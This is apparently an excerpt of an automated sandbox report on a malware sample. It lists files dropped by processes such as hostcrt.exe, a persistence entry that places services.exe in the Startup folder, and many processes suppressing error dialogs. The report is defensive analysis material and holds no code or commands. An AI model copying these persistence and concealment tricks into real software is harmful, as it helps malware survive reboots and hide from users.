                                    Source: C:\ProviderWebSavesNet\hostcrt.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exeJump to dropped file
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeFile created: C:\Users\user\Desktop\brbenDCe.logJump to dropped file
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeFile created: C:\Users\user\Desktop\BySrFogd.logJump to dropped file
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeFile created: C:\Users\user\Desktop\UfHpjBzP.logJump to dropped file
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeFile created: C:\Users\user\Desktop\eGrnpudr.logJump to dropped file
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeFile created: C:\Users\user\Desktop\YGwOgprl.logJump to dropped file
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeFile created: C:\Users\user\Desktop\GuUJMTWW.logJump to dropped file
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeFile created: C:\Users\user\Desktop\BOUJPwoA.logJump to dropped file
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeFile created: C:\Users\user\Desktop\gzGVarPq.logJump to dropped file
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeFile created: C:\Users\user\Desktop\tyuuQYhQ.logJump to dropped file
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeFile created: C:\Users\user\Desktop\OwCQqHNY.logJump to dropped file
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeFile created: C:\Users\user\Desktop\cRzxxdpC.logJump to dropped file
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeFile created: C:\Users\user\Desktop\dtNNImGZ.logJump to dropped file
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeFile created: C:\Users\user\Desktop\CLwRlwDv.logJump to dropped file
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeFile created: C:\Users\user\Desktop\sGbclZIy.logJump to dropped file
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeFile created: C:\ProviderWebSavesNet\hostcrt.exeJump to dropped file
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeFile created: C:\Users\user\Desktop\mrjuDXUe.logJump to dropped file
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeFile created: C:\Users\user\Desktop\TighOBkV.logJump to dropped file
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeFile created: C:\Users\user\Desktop\ehSVuzCX.logJump to dropped file
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeFile created: C:\Users\user\Desktop\KcbhohwK.logJump to dropped file
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeFile created: C:\ProviderWebSavesNet\COBPewMCbcSeQUSyEIOt.exeJump to dropped file
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeFile created: C:\Users\user\Desktop\mBGunJnb.logJump to dropped file
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeFile created: C:\Users\user\Desktop\eObFTdEx.logJump to dropped file
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeFile created: C:\Users\user\Desktop\kyUMRaig.logJump to dropped file
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeFile created: C:\Users\user\Desktop\QyoyMrRT.logJump to dropped file
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeFile created: C:\Windows\Media\Characters\conhost.exeJump to dropped file
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeFile created: C:\Users\user\Desktop\YppwRUxj.logJump to dropped file
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeFile created: C:\Users\user\Desktop\GcNqxydU.logJump to dropped file
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeFile created: C:\Users\user\Desktop\pVwLeLxF.logJump to dropped file
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeFile created: C:\Users\user\Desktop\ehSVuzCX.logJump to dropped file
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeFile created: C:\Users\user\Desktop\WEJfKGnq.logJump to dropped file
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeFile created: C:\Users\user\Desktop\FxsAqTHc.logJump to dropped file
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeFile created: C:\Users\user\Desktop\vOZlGrCu.logJump to dropped file
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeFile created: C:\Users\user\Desktop\lfFVXOxM.logJump to dropped file
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeFile created: C:\Users\user\Desktop\brbenDCe.logJump to dropped file
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeFile created: C:\Users\user\Desktop\RIIODaxx.logJump to dropped file
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeFile created: C:\Users\user\Desktop\IQRzjLYS.logJump to dropped file
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeFile created: C:\Users\user\Desktop\LYOHFeSO.logJump to dropped file
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeFile created: C:\Users\user\Desktop\BpvsVBNg.logJump to dropped file
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeFile created: C:\Users\user\Desktop\sGbclZIy.logJump to dropped file
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeFile created: C:\Users\user\Desktop\bzLxRmdk.logJump to dropped file
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeFile created: C:\Users\user\Desktop\rYiuzuCB.logJump to dropped file
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeFile created: C:\Users\user\Desktop\ipPePSwT.logJump to dropped file
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeFile created: C:\Users\user\Desktop\hkEDPjHT.logJump to dropped file
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeFile created: C:\Users\user\Desktop\YGwOgprl.logJump to dropped file
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeFile created: C:\Users\user\Desktop\GuUJMTWW.logJump to dropped file
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeFile created: C:\Users\user\Desktop\vGpScIbo.logJump to dropped file
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeFile created: C:\Users\user\Desktop\dtNNImGZ.logJump to dropped file
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeFile created: C:\Users\user\Desktop\TLuxYJBs.logJump to dropped file
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeFile created: C:\Users\user\Desktop\KcbhohwK.logJump to dropped file
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeFile created: C:\Users\user\Desktop\BySrFogd.logJump to dropped file
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeFile created: C:\Users\user\Desktop\krBMlBBO.logJump to dropped file
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeFile created: C:\Users\user\Desktop\ihfMljWN.logJump to dropped file
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeFile created: C:\Users\user\Desktop\aONOculH.logJump to dropped file
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeFile created: C:\Users\user\Desktop\tTFBRhfQ.logJump to dropped file
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeFile created: C:\Users\user\Desktop\cRzxxdpC.logJump to dropped file
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeFile created: C:\Users\user\Desktop\TighOBkV.logJump to dropped file
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeFile created: C:\Users\user\Desktop\IuBreppm.logJump to dropped file
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeFile created: C:\Users\user\Desktop\zLibuNkF.logJump to dropped file
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeFile created: C:\Users\user\Desktop\gzGVarPq.logJump to dropped file
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeFile created: C:\Users\user\Desktop\NhTpGmEa.logJump to dropped file
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeFile created: C:\Users\user\Desktop\mrjuDXUe.logJump to dropped file
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeFile created: C:\Users\user\Desktop\eObFTdEx.logJump to dropped file
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeFile created: C:\Users\user\Desktop\UfHpjBzP.logJump to dropped file
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeFile created: C:\Users\user\Desktop\JrdzzpEh.logJump to dropped file
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeFile created: C:\Users\user\Desktop\BOUJPwoA.logJump to dropped file
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeFile created: C:\Users\user\Desktop\jBsEwaTl.logJump to dropped file
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeFile created: C:\Users\user\Desktop\ILIJsLjp.logJump to dropped file
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeFile created: C:\Users\user\Desktop\eGrnpudr.logJump to dropped file
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeFile created: C:\Users\user\Desktop\CLwRlwDv.logJump to dropped file
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeFile created: C:\Users\user\Desktop\mJqNRsNh.logJump to dropped file
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeFile created: C:\Users\user\Desktop\kyUMRaig.logJump to dropped file
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeFile created: C:\Users\user\Desktop\TrDhynDR.logJump to dropped file
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeFile created: C:\Users\user\Desktop\AfbbeRiC.logJump to dropped file
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeFile created: C:\Users\user\Desktop\gIdVKdin.logJump to dropped file
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeFile created: C:\Users\user\Desktop\OwCQqHNY.logJump to dropped file
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeFile created: C:\Users\user\Desktop\mBGunJnb.logJump to dropped file
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeFile created: C:\Users\user\Desktop\tyuuQYhQ.logJump to dropped file
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeFile created: C:\Users\user\Desktop\bmSpwCMB.logJump to dropped file
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeFile created: C:\Users\user\Desktop\QyoyMrRT.logJump to dropped file

                                    Boot Survival

                                    barindex
                                    Drops PE files to the startup folder
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exeJump to dropped file
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeFile created: C:\Users\user\Start Menu\Programs\Startup\services.exeJump to behavior
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeFile created: C:\Users\user\Start Menu\Programs\Startup\c5b4cb5e9653ccJump to behavior
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exeProcess information set: NOOPENFILEERRORBOX
